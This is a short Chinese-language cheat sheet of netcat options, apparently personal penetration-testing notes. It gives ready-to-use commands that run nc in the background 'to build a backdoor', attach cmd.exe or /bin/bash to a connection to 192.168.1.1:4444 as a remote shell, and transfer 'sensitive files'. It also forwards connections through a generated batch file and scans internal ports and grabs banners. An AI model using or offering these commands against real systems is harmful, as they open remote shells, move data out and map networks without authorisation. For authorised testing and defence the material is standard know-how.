-d:不显示命令框，在后台运行，用于建立后门
    eg：nc -d -i 192.168.1.1 -p 4444  (在后台连接1.1的4444端口)
        nc -d 192.168.1.1 4444

-e:执行某个程序，用于建立后门和转发连接
    eg：nc -i 192.168.1.1 -p 4444 -e cmd.exe
        nc -i 192.168.1.1 -p 4444 -e /bin/bash
        nc -i 192.168.1.1 -p 4444 -e 自定义可执行程序路径
        nc -d 192.168.1.1 4444  -e 自定义可执行程序路径

nc可以传输文件，可用于取证，由于是二进制传输，不会影响文件，也可用于敏感文件的单个传输
    eg：nc -lvvp 4444 >1.txt（监听端）
        nc 192.168.1.1 4444 <123.txt（连接端）
        注意：必须先进行监听，才能进行连接。与文件的传输方向无关。
    eg2：nc -lvvp 5555 <1.txt
         nc 192.168.1.1 4444 >123.txt

nc可以用于转发连接，主要是通过借用 -e参数来执行一个可执行文件，
    先写一个适合当前版本的批处理文件，win可以使bat文件。linux可以使sh文件。
    eg：echo nc ip地址 端口 >文件位置
        echo nc 192.168.1.1 4444 >12.bat(创建bat文件)
        nc -lvvp 5555 -e 12.bat
    当有主机连接到5555端口时，该主机会自动将连接导向192.168.1.1的4444端口，实现转发，

nc可以用于信息探测：内网扫描（ip和端口扫描），对目标服务的banner信息进行探测（好像只能单个扫描）
    eg：nc -v -n -z -w1 ip地址 端口段
        nc -v -n -z -w1 192.168.1.1 1-1000
    banner信息的抓取：
        echo " "|nc -v -n -w1 ip地址 端口段
        echo " "|nc -v -n -w1 192.168.1.1 1-1000